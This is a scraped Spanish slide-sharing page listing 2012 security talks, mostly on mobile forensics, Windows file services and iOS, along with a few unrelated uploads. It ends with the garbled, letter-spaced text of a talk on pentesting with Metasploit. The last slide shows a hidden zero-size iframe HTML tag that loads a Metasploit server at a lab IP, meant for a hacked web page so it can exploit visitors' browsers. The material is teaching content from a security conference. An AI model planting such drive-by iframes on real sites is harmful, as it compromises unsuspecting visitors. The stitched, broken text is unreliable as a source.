Charla impartida por Pablo González, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.
[Permiso de archivos NTFS ]
[Sistema De Archivos Encriptado ]
[BITLOCKER]
[Compartir carpetas]
[Instalar El Rol De Servidor De Servicios De Archivo]
[Sistema De Archivos Distribuido]
[Los Archivos Sin Conexión]
[BRANCHCACHE]
[Instantáneas]
[Copia De Seguridad De Servidor De Windows]
Charla impartida por Juan Miguel Aguayo, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.
[Permiso de archivos NTFS ]
[Sistema De Archivos Encriptado ]
[BITLOCKER]
[Compartir carpetas]
[Instalar El Rol De Servidor De Servicios De Archivo]
[Sistema De Archivos Distribuido]
[Los Archivos Sin Conexión]
[BRANCHCACHE]
[Instantáneas]
[Copia De Seguridad De Servidor De Windows]
Charla impartida por Juan Miguel Aguayo, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.
presentación de José Antonio Caldés, emprendedor de The Grove, food & social collaboration, una plataforma web para ayudar a las empresas a que sus trabajadores tengan acceso a una alimentación saludable y una vida activa que, además, colabora socialmente bajo un modelo de empresa social.
Charla impartida por Javier Domínguez, de la empresa Microsoft para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.
presentación de José Antonio Caldés, emprendedor de The Grove, food & social collaboration, una plataforma web para ayudar a las empresas a que sus trabajadores tengan acceso a una alimentación saludable y una vida activa que, además, colabora socialmente bajo un modelo de empresa social.
Charla impartida por Javier Domínguez, de la empresa Microsoft para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.
Charla impartida por Josep Albors, de la empresa ESET - Ontinet.com para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.
Atacando iphone a través de wireless y javascript botnetEventos Creativos
Charla impartida por Ioseba Palop, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.
Charla impartida por Chema Alonso de la Empresa Informática 64, para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.
Presentación correspondiente a las charlas: Windows 8: Arquitectura y seguridad y Desarrollo de aplicaciones seguras en Windows 8 estilo Metro, impartidas en el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de junio de 2012.
Charla: Análisis Forense de Dispositivos Android, impartida por Antonio Díaz de Informática 64 para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012. Diapositivas 2/3
Charla: Análisis Forense de Dispositivos Android, impartida por Antonio Díaz de Informática 64 para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012. Diapositivas 1/3.
Charla: Análisis Forense de Dispositivos iOS, impartida por Juan M. Aguayo de Informática 64 para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Charla: Arquitectura, aplicaciones y seguridad en iOS, impartida por Juan M. Aguayo de Informática 64 para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Jailbreak y rooting más allá de los límites del dispositivoEventos Creativos
Charla: Jailbreak y rooting: más allá de los límites del dispositivo, impartida por Juan M. Aguayo de Informática 64 para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Charla: iOS en entorno corporativo, impartida por Juan M. Aguayo de Informática 64 para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Charla: Análisis Forense de tarjeta SIM, smartcards, etc., impartida por Juan M. Aguayo de Informática 64 para el curso de Especialización de Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Charla: Lo que las Apps esconden, impartida por Simón Roses de Vulnex para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Charla: Firma biométrica de dispositivos móviles, impartida por Rames Sarwat de SmartAccess para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Charla: NFC en móviles, impartida por Jesús González en el curso Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Charla: Fraude en tecnologías móviles, impartida por Mikel Gastesi y Álvaro del Hoyo de S21sec para el curso de Especialización de Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Charla: Malware en dispositivos Móviles, impartida por Josep Albors de Eset para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Análisis forense con oxygen forensics suite 2012 analystEventos Creativos
Charla: Análisis Forense con Oxygen Forensic Suite 2012 Analyst, impartida por Antonio Díaz de Informática 64 para el curso de Especialización en Dispositivos Móviles que tuvo lugar en la Facultad de Informática de la Universidad de A Coruña del 20 al 22 de Junio de 2012.
Inteligencia Artificial y Ciberseguridad.pdfEmilio Casbas
Recopilación de los puntos más interesantes de diversas presentaciones, desde los visionarios conceptos de Alan Turing, pasando por la paradoja de Hans Moravec y la descripcion de Singularidad de Max Tegmark, hasta los innovadores avances de ChatGPT, y de cómo la IA está transformando la seguridad digital y protegiendo nuestras vidas.
Es un diagrama para La asistencia técnica o apoyo técnico es brindada por las compañías para que sus clientes puedan hacer uso de sus productos o servicios de la manera en que fueron puestos a la venta.
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informáticavazquezgarciajesusma
En este proyecto de investigación nos adentraremos en el fascinante mundo de la intersección entre el arte y los medios de comunicación en el campo de la informática.
La rápida evolución de la tecnología ha llevado a una fusión cada vez más estrecha entre el arte y los medios digitales, generando nuevas formas de expresión y comunicación.
Continuando con el desarrollo de nuestro proyecto haremos uso del método inductivo porque organizamos nuestra investigación a la particular a lo general. El diseño metodológico del trabajo es no experimental y transversal ya que no existe manipulación deliberada de las variables ni de la situación, si no que se observa los fundamental y como se dan en su contestó natural para después analizarlos.
El diseño es transversal porque los datos se recolectan en un solo momento y su propósito es describir variables y analizar su interrelación, solo se desea saber la incidencia y el valor de uno o más variables, el diseño será descriptivo porque se requiere establecer relación entre dos o más de estás.
Mediante una encuesta recopilamos la información de este proyecto los alumnos tengan conocimiento de la evolución del arte y los medios de comunicación en la información y su importancia para la institución.
1. Pe n t e s t i n g c o n
Me t a s p l o i t
F r a me w o r k
Pablo González
2. ¿Qué e s
Me t a s p l o i t ?
Es e l c a o s , p u r o
y b e l l o p o r
f u e r a , e t e r n o y
c o mp l e j o p o r
d e n t r o , e s p u r o
p e n t e s t i n g …
3. Ag e n d a
1. A r q u i t e c t u r a d e
Me t a s p l o i t
2. Fases de un test de intrusión
3. ¿Dónde p a r t i c i p a
Me t a s p l o i t ?
4. El arte de la intrusión
5. El bien y el mal…
6. D e m o
7. L a t i e n d a e n c a s a
7. Fa s e s
Alcance y términos del test de intrusión
Recolección de información
Análisis d e
v u l n e r a b i l i d a d e s
Explotación d e
v u l n e r a b i l i d a d e s
Post-Explotación d e l s i s t e m a
Generación d e i n f o r m e s
9. Lo importante es…
P a r t i c i p a r !!!
Recolección de información
Análisis d e
v u l n e r a b i l i d a d e s
Explotación d e
v u l n e r a b i l i d a d e s
Post-Explotación
Pero incluso… a y u d a a
11. ¿Arte o Ingeniería?
Pr o c e d u r e
p e n t e s t i n g ;
B E GI N
wr i t e l n („p a s o 1‟)
wr i t e l n („p a s o 2‟)
…
a r t e ;
END;
Pr o c e d u r e a r t e ;
…
13. Elección d e l
p a y l o a d
Más d e 200 p a y l o a d s …
Son nuestras cartas… ¿Siempre
u s a r e mo s a l r e y ?
14. Tipos de Intrusión
¿Cómo l a n z o l o s
e x p l o i t s ?
Sin Interacción… (t e r r o r !)
Con Interacción… (c l i e n t -s i d e
a t t a c k !)
15. Cl i e n t Si d e
At t a c k !
D a r k S h a d o w s , ¿Cómo hago para
que hagan peticiones a mí?
M a i l i n g ? (s p a m ? ? )
Foros…
Páginas w e b h a c k e a d a s …
P u b l i c a c i o n e s e n
I n t e r n e t
A c o r t a d o r e s …
A t a q u e s l o c a l e s (D N S
Sp o o f )
17. El límite
Debemos ser éticos… ¿Lo s o m o s ?
La delgada línea…
P o d e mo s u t i l i z a r l o s
a t a q u e s c l i e n t -s i d e
p a r a : (m u c h a s , m u c h a s
c o s a s )
Distribución malware…
P a y l o a d s p e r ma n e n t e s
19. ¿Qué v a m o s a
h a c e r ?
Escenario: (idea del mundo real… ^ ^ )
1. Página h a c k e a d a …
2. I f r a m e q u e a p u n t e a 1
s e r v e r c o n MS F
3. L a n z a m i e n t o d e
e x p l o i t s c o n t r a
c l i e n t e
4. Obtenemos el control…
20. I f r a me …
<i f r a m e
s r c =h t t p ://192.168.56.101:8080
/ w i d t h =0 h e i g h t =0
s t y l e =“h i d d e n ”
f r a m e b o r d e r =0
m a r g i n h e i g h t =0
m a r g i n w i d t h =0/>